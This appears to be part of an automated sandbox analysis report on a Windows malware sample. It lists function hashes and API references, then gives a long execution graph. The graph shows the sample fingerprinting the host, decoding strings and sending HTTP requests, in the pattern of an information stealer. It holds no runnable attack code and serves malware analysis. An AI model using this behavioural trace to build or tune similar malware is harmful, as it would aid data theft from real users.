                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57c4579a5890c425686cd50170c1af0b7d99fda424955e6261b8de2e866cadb7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C31E671D00209ABCB15DF69C4857BDBBB5FB05360F14422AF92A97781D734A940CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003C6503
                                                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 003C65EB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                                                  • String ID: @-B
                                                                                                                                                                                                                                                                                                  • API String ID: 3761405300-925052545
                                                                                                                                                                                                                                                                                                  • Opcode ID: 38850162e596564fdf980139bd1791f7cdc1a0fcaa765bb170ae37f003987918
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe93f193a707d0c5f873f77ba62d14ef6da653402016c47e1873886a10226072
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38850162e596564fdf980139bd1791f7cdc1a0fcaa765bb170ae37f003987918
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 152112B5620200ABD739CF15FE82B507BA4BB08301F92513AE509CB3B0E3F45982EB0D
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003C6609
                                                                                                                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 003C66C6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                                                                  • String ID: @-B
                                                                                                                                                                                                                                                                                                  • API String ID: 3761405300-925052545
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f6b24cdb6a92fbdab721cdfd1daf75a38955f293bb4ddfa03eefe381b138411
                                                                                                                                                                                                                                                                                                  • Instruction ID: 399e7b32a5ccd8f040e4cb81a22f70d77a5cff87baa0ffcb08882700a5847f36
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f6b24cdb6a92fbdab721cdfd1daf75a38955f293bb4ddfa03eefe381b138411
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B11DFB5B20604ABC725DF15FE816407BA4BB08341B82513AE8098B3B0E7F09993EF4D
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C15E6
                                                                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003C161E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C42D8: _Yarn.LIBCPMT ref: 003C42F7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C42D8: _Yarn.LIBCPMT ref: 003C431B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                                                                                  • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                                                                                  • Opcode ID: 953222e1584cafdbef34c0849772685c7799ba2a58708774016e061935f8de5e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 020e0371c62f9654e529920678eb81890c42110e5b2016735d8d6dc8d6e67560
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 953222e1584cafdbef34c0849772685c7799ba2a58708774016e061935f8de5e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF01271545B509E83319F7A5481547FBE4BE19310794CE2EE1DEC3A11D734A404CB59
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 003FD3BF
                                                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 003FD3D4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                                                                  • String ID: LpB
                                                                                                                                                                                                                                                                                                  • API String ID: 3728558374-825029884
                                                                                                                                                                                                                                                                                                  • Opcode ID: 94587640906c9a53a8652821ec0945a3fc056fa5de4e47cf6661d2b417a03d3a
                                                                                                                                                                                                                                                                                                  • Instruction ID: d7139637e0099990e2e7cdd268ea6dad843632d8042422520eb604d14d7b1d42
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94587640906c9a53a8652821ec0945a3fc056fa5de4e47cf6661d2b417a03d3a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE02B79D0420C76CB14EFA5D855AFE7768DF00304F40822FFF1692181EB34E6088AA7
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:6.2%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                  Signature Coverage:9.9%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:40
402360 11 API calls 59697->59698 59699 40421d 59698->59699 59700 402360 11 API calls 59699->59700 59701 404233 59700->59701 59702 402360 11 API calls 59701->59702 59703 404249 59702->59703 59704 402360 11 API calls 59703->59704 59705 40425f 59704->59705 59706 402360 11 API calls 59705->59706 59707 404275 59706->59707 59708 402360 11 API calls 59707->59708 59709 40428e 59708->59709 59710 402360 11 API calls 59709->59710 59711 4042a4 59710->59711 59712 402360 11 API calls 59711->59712 59713 4042ba 59712->59713 59714 402360 11 API calls 59713->59714 59715 4042d0 59714->59715 59716 402360 11 API calls 59715->59716 59717 4042e6 59716->59717 59718 402360 11 API calls 59717->59718 59719 4042fc 59718->59719 59720 402360 11 API calls 59719->59720 59721 404315 59720->59721 59722 402360 11 API calls 59721->59722 59723 40432b 59722->59723 59724 402360 11 API calls 59723->59724 59725 404341 59724->59725 59726 402360 11 API calls 59725->59726 59727 404357 59726->59727 59728 402360 11 API calls 59727->59728 59729 40436d 59728->59729 59730 402360 11 API calls 59729->59730 59731 404383 59730->59731 59732 402360 11 API calls 59731->59732 59733 40439c 59732->59733 59734 402360 11 API calls 59733->59734 59735 4043b2 59734->59735 59736 402360 11 API calls 59735->59736 59737 4043c8 59736->59737 59738 402360 11 API calls 59737->59738 59739 4043de 59738->59739 59740 402360 11 API calls 59739->59740 59741 4043f4 59740->59741 59742 402360 11 API calls 59741->59742 59743 40440a 59742->59743 59744 402360 11 API calls 59743->59744 59745 404423 59744->59745 59746 4188e0 59745->59746 59747 4188ed 43 API calls 59746->59747 59748 418cfe 9 API calls 59746->59748 59747->59748 59749 418da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59748->59749 59750 418e18 59748->59750 59749->59750 59751 418ee2 59750->59751 59752 418e25 8 API calls 59750->59752 59753 418eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59751->59753 59754 418f5f 
59751->59754 59752->59751 59753->59754 59755 418ff9 59754->59755 59756 418f6c 6 API calls 59754->59756 59757 419006 9 API calls 59755->59757 59758 4190dc 59755->59758 59756->59755 59757->59758 59759 4190e5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59758->59759 59760 419159 59758->59760 59759->59760 59761 419162 GetProcAddress GetProcAddress 59760->59761 59762 41918d 59760->59762 59761->59762 59763 4191c1 59762->59763 59764 419196 GetProcAddress GetProcAddress 59762->59764 59765 4192b9 59763->59765 59766 4191ce 10 API calls 59763->59766 59764->59763 59767 4192c2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59765->59767 59768 41931e 59765->59768 59766->59765 59767->59768 59769 419327 GetProcAddress 59768->59769 59770 41933a 59768->59770 59769->59770 59771 419343 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 59770->59771 59772 41939f 59770->59772 59771->59772 59773 417d7d 59772->59773 59774 4193a8 GetProcAddress 59772->59774 59775 401120 59773->59775 59774->59773 59776 40fe60 lstrcpy 59775->59776 59777 401149 59776->59777 59778 40fe60 lstrcpy 59777->59778 59779 40115c 59778->59779 59780 40fe60 lstrcpy 59779->59780 59781 401178 59780->59781 59782 414330 59781->59782 59783 414368 59782->59783 59784 40feb0 2 API calls 59783->59784 59785 414391 59784->59785 59786 40feb0 2 API calls 59785->59786 59787 41439e 59786->59787 59788 40feb0 2 API calls 59787->59788 59789 4143ab 59788->59789 59790 40fe20 lstrcpy 59789->59790 59791 4143b8 59790->59791 59792 40fe20 lstrcpy 59791->59792 59793 4143c9 59792->59793 59794 40fe20 lstrcpy 59793->59794 59795 4143da 59794->59795 59796 40fe20 lstrcpy 59795->59796 59797 4143ee 59796->59797 59798 40fe20 lstrcpy 59797->59798 59799 4143ff 59798->59799 59800 40fe20 lstrcpy 59799->59800 59843 414413 59800->59843 59801 402480 lstrcpy 59801->59843 59803 4024e0 lstrcpy 59803->59843 59804 414637 StrCmpCA 59804->59843 59805 4146cc StrCmpCA 59806 4152a6 59805->59806 59805->59843 59807 40ff00 
lstrcpy 59806->59807 59808 4152b2 59807->59808 60896 4024e0 59808->60896 59811 40ff00 lstrcpy 59813 4152cb 59811->59813 59812 41489f StrCmpCA 59814 415197 59812->59814 59812->59843 60899 402770 lstrcpy 59813->60899 59815 40ff00 lstrcpy 59814->59815 59816 4151a3 59815->59816 60894 402570 lstrcpy 59816->60894 59820 4152df 59823 40ff00 lstrcpy 59820->59823 59821 4151ac 59824 40ff00 lstrcpy 59821->59824 59822 414a8b StrCmpCA 59825 415085 59822->59825 59822->59843 59826 4152ef 59823->59826 59827 4151bc 59824->59827 59828 40ff00 lstrcpy 59825->59828 59831 40fe60 lstrcpy 59826->59831 60895 4027a0 lstrcpy 59827->60895 59829 415094 59828->59829 60892 402600 lstrcpy 59829->60892 59834 415308 59831->59834 59838 40fe60 lstrcpy 59834->59838 59835 4151d0 59839 40ff00 lstrcpy 59835->59839 59836 41509d 59840 40ff00 lstrcpy 59836->59840 59837 414c5e StrCmpCA 59842 414f70 59837->59842 59837->59843 59844 415318 59838->59844 59845 4151e0 59839->59845 59846 4150ad 59840->59846 59841 402510 lstrcpy 59841->59843 59847 40ff00 lstrcpy 59842->59847 59843->59801 59843->59803 59843->59804 59843->59805 59843->59812 59843->59822 59843->59837 59843->59841 59848 402600 lstrcpy 59843->59848 59849 413b80 29 API calls 59843->59849 59850 402630 lstrcpy 59843->59850 59853 41480a StrCmpCA 59843->59853 59861 402570 lstrcpy 59843->59861 59862 401120 lstrcpy 59843->59862 59866 414e3d StrCmpCA 59843->59866 59867 4025a0 lstrcpy 59843->59867 59873 40fe60 lstrcpy 59843->59873 59874 4026c0 lstrcpy 59843->59874 59877 4149e9 StrCmpCA 59843->59877 59889 40ff00 lstrcpy 59843->59889 59893 402720 lstrcpy 59843->59893 59895 414bc9 StrCmpCA 59843->59895 59899 402690 lstrcpy 59843->59899 59906 414da8 StrCmpCA 59843->59906 59911 413a40 24 API calls 59843->59911 60881 4024b0 59843->60881 60884 402540 lstrcpy 59843->60884 60885 4025d0 lstrcpy 59843->60885 60886 402660 lstrcpy 59843->60886 60887 4026f0 lstrcpy 59843->60887 59851 40fe60 lstrcpy 59844->59851 59854 40fe60 lstrcpy 59845->59854 60893 4027d0 lstrcpy 59846->60893 
59852 414f7c 59847->59852 59848->59843 59849->59843 59850->59843 59913 414ee3 59851->59913 60890 402690 lstrcpy 59852->60890 59853->59843 59858 4151f9 59854->59858 59863 40fe60 lstrcpy 59858->59863 59859 4150c1 59864 40ff00 lstrcpy 59859->59864 59860 414f85 59865 40ff00 lstrcpy 59860->59865 59861->59843 59862->59843 59868 415209 59863->59868 59869 4150d1 59864->59869 59870 414f95 59865->59870 59871 414e58 59866->59871 59872 414e48 Sleep 59866->59872 59867->59843 59875 40fe60 lstrcpy 59868->59875 59881 40fe60 lstrcpy 59869->59881 60891 402800 lstrcpy 59870->60891 59876 40ff00 lstrcpy 59871->59876 59872->59843 59873->59843 59874->59843 59875->59913 59878 414e67 59876->59878 59877->59843 60888 402720 lstrcpy 59878->60888 59884 4150ea 59881->59884 59883 414fac 59886 40ff00 lstrcpy 59883->59886 59887 40fe60 lstrcpy 59884->59887 59885 414e70 59888 40ff00 lstrcpy 59885->59888 59890 414fbc 59886->59890 59891 4150fa 59887->59891 59892 414e80 59888->59892 59889->59843 59897 40fe60 lstrcpy 59890->59897 59894 40fe60 lstrcpy 59891->59894 60889 402830 lstrcpy 59892->60889 59893->59843 59894->59913 59895->59843 59900 414fd8 59897->59900 59898 414e97 59901 40ff00 lstrcpy 59898->59901 59899->59843 59902 40fe60 lstrcpy 59900->59902 59903 414ea7 59901->59903 59904 414fe8 59902->59904 59907 40fe60 lstrcpy 59903->59907 59905 40fe60 lstrcpy 59904->59905 59905->59913 59906->59843 59908 414ec3 59907->59908 59909 40fe60 lstrcpy 59908->59909 59910 414ed3 59909->59910 59912 40fe60 lstrcpy 59910->59912 59911->59843 59912->59913 59913->59034 59915 40fe77 59914->59915 59916 40fe8e 59915->59916 59917 40fe86 lstrcpy 59915->59917 59916->59047 59917->59916 59919 40ff9b 59918->59919 59920 40ffc5 59919->59920 59921 40ffb1 lstrcpy lstrcat 59919->59921 59920->59053 59921->59920 59922->59057 59924 40fe20 lstrcpy 59923->59924 59925 40246b 59924->59925 59926 410d30 GetWindowsDirectoryA 59925->59926 59927 410d72 59926->59927 59928 410d79 GetVolumeInformationA 59926->59928 59927->59928 59929 410db0 
59928->59929 59930 410de6 GetProcessHeap HeapAlloc 59929->59930 59931 410e00 59930->59931 59932 410e1c wsprintfA lstrcat 59930->59932 59933 40fe20 lstrcpy 59931->59933 60900 410cd0 GetCurrentHwProfileA 59932->60900 59935 410e0b 59933->59935 59935->59063 59936 410e4f 59937 410e61 lstrlen 59936->59937 59938 410e76 59937->59938 60907 411b50 lstrcpy malloc strncpy 59938->60907 59940 410e80 59941 410e8e lstrcat 59940->59941 59942 410ea2 59941->59942 59943 40fe20 lstrcpy 59942->59943 59944 410eb5 59943->59944 59944->59063 59946 40fe60 lstrcpy 59945->59946 59947 404540 59946->59947 60908 404430 59947->60908 59949 40454c 59950 40fe20 lstrcpy 59949->59950 59951 40456d 59950->59951 59952 40fe20 lstrcpy 59951->59952 59953 404581 59952->59953 59954 40fe20 lstrcpy 59953->59954 59955 404592 59954->59955 59956 40fe20 lstrcpy 59955->59956 59957 4045a3 59956->59957 59958 40fe20 lstrcpy 59957->59958 59959 4045b4 59958->59959 59960 4045c9 InternetOpenA StrCmpCA 59959->59960 59961 4045f4 59960->59961 59962 404b68 InternetCloseHandle 59961->59962 60916 411450 59961->60916 59976 404b7a 59962->59976 59964 40460e 59965 40ff50 2 API calls 59964->59965 59966 404622 59965->59966 59967 40ff00 lstrcpy 59966->59967 59968 40462f 59967->59968 59969 40ffe0 3 API calls 59968->59969 59970 404657 59969->59970 59971 40ff00 lstrcpy 59970->59971 59972 404664 59971->59972 59973 40ffe0 3 API calls 59972->59973 59974 404680 59973->59974 59975 40ff00 lstrcpy 59974->59975 59977 40468d 59975->59977 59976->59067 59978 40ff50 2 API calls 59977->59978 59979 4046a8 59978->59979 59980 40ff00 lstrcpy 59979->59980 59981 4046b5 59980->59981 59982 40ffe0 3 API calls 59981->59982 59983 4046d1 59982->59983 59984 40ff00 lstrcpy 59983->59984 59985 4046de 59984->59985 59986 40ffe0 3 API calls 59985->59986 59987 4046fa 59986->59987 59988 40ff00 lstrcpy 59987->59988 59989 404707 59988->59989 59990 40ffe0 3 API calls 59989->59990 59991 404724 59990->59991 59992 40ff50 2 API calls 59991->59992 59993 404737 59992->59993 59994 
40ff00 lstrcpy 59993->59994 59995 404744 59994->59995 59996 40475b InternetConnectA 59995->59996 59996->59962 59997 404787 HttpOpenRequestA 59996->59997 59998 4047c5 59997->59998 59999 404b5b InternetCloseHandle 59997->59999 60000 4047e1 59998->60000 60001 4047cb InternetSetOptionA 59998->60001 59999->59962 60002 40ffe0 3 API calls 60000->60002 60001->60000 60003 4047f2 60002->60003 60004 40ff00 lstrcpy 60003->60004 60005 4047ff 60004->60005 60006 40ff50 2 API calls 60005->60006 60007 40481a 60006->60007 60008 40ff00 lstrcpy 60007->60008 60009 404827 60008->60009 60010 40ffe0 3 API calls 60009->60010 60011 404843 60010->60011 60012 40ff00 lstrcpy 60011->60012 60013 404850 60012->60013 60014 40ffe0 3 API calls 60013->60014 60015 40486e 60014->60015 60016 40ff00 lstrcpy 60015->60016 60017 40487b 60016->60017 60018 40ffe0 3 API calls 60017->60018 60019 404897 60018->60019 60020 40ff00 lstrcpy 60019->60020 60021 4048a4 60020->60021 60022 40ffe0 3 API calls 60021->60022 60023 4048c0 60022->60023 60024 40ff00 lstrcpy 60023->60024 60025 4048cd 60024->60025 60026 40ff50 2 API calls 60025->60026 60027 4048e8 60026->60027 60028 40ff00 lstrcpy 60027->60028 60029 4048f5 60028->60029 60030 40ffe0 3 API calls 60029->60030 60031 404911 60030->60031 60032 40ff00 lstrcpy 60031->60032 60033 40491e 60032->60033 60034 40ffe0 3 API calls 60033->60034 60035 40493a 60034->60035 60036 40ff00 lstrcpy 60035->60036 60037 404947 60036->60037 60038 40ff50 2 API calls 60037->60038 60039 404962 60038->60039 60040 40ff00 lstrcpy 60039->60040 60041 40496f 60040->60041 60042 40ffe0 3 API calls 60041->60042 60043 40498b 60042->60043 60044 40ff00 lstrcpy 60043->60044 60045 404998 60044->60045 60046 40ffe0 3 API calls 60045->60046 60047 4049b6 60046->60047 60048 40ff00 lstrcpy 60047->60048 60049 4049c3 60048->60049 60050 40ffe0 3 API calls 60049->60050 60051 4049df 60050->60051 60052 40ff00 lstrcpy 60051->60052 60053 4049ec 60052->60053 60054 40ffe0 3 API calls 60053->60054 60055 404a08 60054->60055 
60056 40ff00 lstrcpy 60055->60056 60057 404a15 60056->60057 60058 40ff50 2 API calls 60057->60058 60059 404a30 60058->60059 60060 40ff00 lstrcpy 60059->60060 60061 404a3d 60060->60061 60062 40fe20 lstrcpy 60061->60062 60063 404a55 60062->60063 60064 40ff50 2 API calls 60063->60064 60065 404a69 60064->60065 60066 40ff50 2 API calls 60065->60066 60067 404a7c 60066->60067 60068 40ff00 lstrcpy 60067->60068 60069 404a89 60068->60069 60070 404aa9 lstrlen 60069->60070 60071 404ab9 60070->60071 60072 404ac2 lstrlen 60071->60072 60922 4100c0 60072->60922 60074 404ad2 HttpSendRequestA InternetReadFile 60075 404af5 60074->60075 60076 404b49 InternetCloseHandle 60074->60076 60075->60076 60080 404afc 60075->60080 60923 40fea0 60076->60923 60078 40ffe0 3 API calls 60078->60080 60079 40ff00 lstrcpy 60079->60080 60080->60078 60080->60079 60081 404b2e InternetReadFile 60080->60081 60081->60075 60081->60076 60927 4100c0 60082->60927 60084 4127d7 StrCmpCA 60085 4127e2 ExitProcess 60084->60085 60086 4127e9 60084->60086 60087 4127f9 strtok_s 60086->60087 60088 41280a 60087->60088 60089 41294b 60087->60089 60090 41292f strtok_s 60088->60090 60091 4128e1 StrCmpCA 60088->60091 60092 412840 StrCmpCA 60088->60092 60093 4128a2 StrCmpCA 60088->60093 60094 412824 StrCmpCA 60088->60094 60095 4128b7 StrCmpCA 60088->60095 60096 4128f7 StrCmpCA 60088->60096 60097 412878 StrCmpCA 60088->60097 60098 41291b StrCmpCA 60088->60098 60099 41285c StrCmpCA 60088->60099 60100 4128cc StrCmpCA 60088->60100 60101 40feb0 2 API calls 60088->60101 60089->59069 60090->60088 60090->60089 60091->60090 60092->60088 60092->60090 60093->60088 60093->60090 60094->60088 60094->60090 60095->60088 60095->60090 60096->60090 60097->60088 60097->60090 60098->60090 60099->60088 60099->60090 60100->60088 60100->60090 60101->60088 60103 40fe60 lstrcpy 60102->60103 60104 405d20 60103->60104 60105 404430 5 API calls 60104->60105 60106 405d2c 60105->60106 60107 40fe20 lstrcpy 60106->60107 60108 405d4d 60107->60108 60109 40fe20 
lstrcpy 60108->60109 60110 405d61 60109->60110 60111 40fe20 lstrcpy 60110->60111 60112 405d72 60111->60112 60113 40fe20 lstrcpy 60112->60113 60114 405d83 60113->60114 60115 40fe20 lstrcpy 60114->60115 60116 405d94 60115->60116 60117 405da9 InternetOpenA StrCmpCA 60116->60117 60118 405dd4 60117->60118 60119 4064bf InternetCloseHandle 60118->60119 60120 411450 2 API calls 60118->60120 60121 4064d5 60119->60121 60122 405dee 60120->60122 60934 406f50 CryptStringToBinaryA 60121->60934 60124 40ff50 2 API calls 60122->60124 60125 405e02 60124->60125 60127 40ff00 lstrcpy 60125->60127 60126 4064db 60128 40feb0 2 API calls 60126->60128 60143 406509 60126->60143 60131 405e0f 60127->60131 60129 4064ee 60128->60129 60130 40ffe0 3 API calls 60129->60130 60132 4064fd 60130->60132 60134 40ffe0 3 API calls 60131->60134 60133 40ff00 lstrcpy 60132->60133 60133->60143 60135 405e37 60134->60135 60136 40ff00 lstrcpy 60135->60136 60137 405e44 60136->60137 60138 40ffe0 3 API calls 60137->60138 60139 405e60 60138->60139 60140 40ff00 lstrcpy 60139->60140 60141 405e6d 60140->60141 60142 40ff50 2 API calls 60141->60142 60144 405e88 60142->60144 60143->59075 60145 40ff00 lstrcpy 60144->60145 60146 405e95 60145->60146 60147 40ffe0 3 API calls 60146->60147 60148 405eb1 60147->60148 60149 40ff00 lstrcpy 60148->60149 60150 405ebe 60149->60150 60151 40ffe0 3 API calls 60150->60151 60152 405eda 60151->60152 60153 40ff00 lstrcpy 60152->60153 60154 405ee7 60153->60154 60155 40ffe0 3 API calls 60154->60155 60156 405f04 60155->60156 60157 40ff50 2 API calls 60156->60157 60158 405f17 60157->60158 60159 40ff00 lstrcpy 60158->60159 60160 405f24 60159->60160 60161 405f3b InternetConnectA 60160->60161 60162 405f67 HttpOpenRequestA 60161->60162 60163 4064bc 60161->60163 60164 4064b5 InternetCloseHandle 60162->60164 60165 405fa5 60162->60165 60163->60119 60164->60163 60166 405fc1 60165->60166 60167 405fab InternetSetOptionA 60165->60167 60168 40ffe0 3 API calls 60166->60168 60167->60166 60169 405fd2 
60168->60169 60170 40ff00 lstrcpy 60169->60170 60171 405fdf 60170->60171 60172 40ff50 2 API calls 60171->60172 60173 405ffa 60172->60173 60174 40ff00 lstrcpy 60173->60174 60175 406007 60174->60175 60176 40ffe0 3 API calls 60175->60176 60177 406023 60176->60177 60178 40ff00 lstrcpy 60177->60178 60179 406030 60178->60179 60180 40ffe0 3 API calls 60179->60180 60181 40604d 60180->60181 60182 40ff00 lstrcpy 60181->60182 60183 40605a 60182->60183 60184 40ffe0 3 API calls 60183->60184 60185 406078 60184->60185 60186 40ff00 lstrcpy 60185->60186 60187 406085 60186->60187 60188 40ffe0 3 API calls 60187->60188 60189 4060a1 60188->60189 60190 40ff00 lstrcpy 60189->60190 60191 4060ae 60190->60191 60192 40ff50 2 API calls 60191->60192 60193 4060c9 60192->60193 60194 40ff00 lstrcpy 60193->60194 60195 4060d6 60194->60195 60196 40ffe0 3 API calls 60195->60196 60197 4060f2 60196->60197 60198 40ff00 lstrcpy 60197->60198 60199 4060ff 60198->60199 60200 40ffe0 3 API calls 60199->60200 60201 40611b 60200->60201 60202 40ff00 lstrcpy 60201->60202 60203 406128 60202->60203 60204 40ff50 2 API calls 60203->60204 60205 406143 60204->60205 60206 40ff00 lstrcpy 60205->60206 60207 406150 60206->60207 60208 40ffe0 3 API calls 60207->60208 60209 40616c 60208->60209 60210 40ff00 lstrcpy 60209->60210 60211 406179 60210->60211 60212 40ffe0 3 API calls 60211->60212 60213 406196 60212->60213 60214 40ff00 lstrcpy 60213->60214 60215 4061a3 60214->60215 60216 40ffe0 3 API calls 60215->60216 60217 4061bf 60216->60217 60218 40ff00 lstrcpy 60217->60218 60219 4061cc 60218->60219 60220 40ffe0 3 API calls 60219->60220 60221 4061e8 60220->60221 60222 40ff00 lstrcpy 60221->60222 60223 4061f5 60222->60223 60224 402450 lstrcpy 60223->60224 60225 406209 60224->60225 60226 40ff50 2 API calls 60225->60226 60227 40621d 60226->60227 60228 40ff00 lstrcpy 60227->60228 60229 40622a 60228->60229 60230 40ffe0 3 API calls 60229->60230 60231 406252 60230->60231 60232 40ff00 lstrcpy 60231->60232 60233 40625f 60232->60233 60234 
40ffe0 3 API calls 60233->60234 60235 40627b 60234->60235 60236 40ff00 lstrcpy 60235->60236 60237 406288 60236->60237 60238 40ff50 2 API calls 60237->60238 60239 4062a3 60238->60239 60240 40ff00 lstrcpy 60239->60240 60241 4062b0 60240->60241 60242 40ffe0 3 API calls 60241->60242 60243 4062cc 60242->60243 60244 40ff00 lstrcpy 60243->60244 60245 4062d9 60244->60245 60246 40ffe0 3 API calls 60245->60246 60247 4062f7 60246->60247 60248 40ff00 lstrcpy 60247->60248 60249 406304 60248->60249 60250 40ffe0 3 API calls 60249->60250 60251 406320 60250->60251 60252 40ff00 lstrcpy 60251->60252 60253 40632d 60252->60253 60254 40ffe0 3 API calls 60253->60254 60255 406349 60254->60255 60256 40ff00 lstrcpy 60255->60256 60257 406356 60256->60257 60258 40ff50 2 API calls 60257->60258 60259 406371 60258->60259 60260 40ff00 lstrcpy 60259->60260 60261 40637e 60260->60261 60262 406391 lstrlen 60261->60262 60928 4100c0 60262->60928 60264 4063a2 lstrlen GetProcessHeap HeapAlloc 60929 4100c0 60264->60929 60266 4063c5 lstrlen 60930 4100c0 60266->60930 60268 4063d5 memcpy 60931 4100c0 60268->60931 60270 4063e7 lstrlen 60271 4063f7 60270->60271 60272 406400 lstrlen memcpy 60271->60272 60932 4100c0 60272->60932 60274 40641c lstrlen 60933 4100c0 60274->60933 60276 40642c HttpSendRequestA InternetReadFile 60277 4064a8 InternetCloseHandle 60276->60277 60279 406452 60276->60279 60277->60164 60278 40ffe0 3 API calls 60278->60279 60279->60277 60279->60278 60280 40ff00 lstrcpy 60279->60280 60281 40648d InternetReadFile 60279->60281 60280->60279 60281->60277 60281->60279 60939 4100c0 60282->60939 60284 41218f strtok_s 60285 4121f9 60284->60285 60288 41219c 60284->60288 60285->59077 60286 40feb0 2 API calls 60287 4121e2 strtok_s 60286->60287 60287->60285 60287->60288 60288->60286 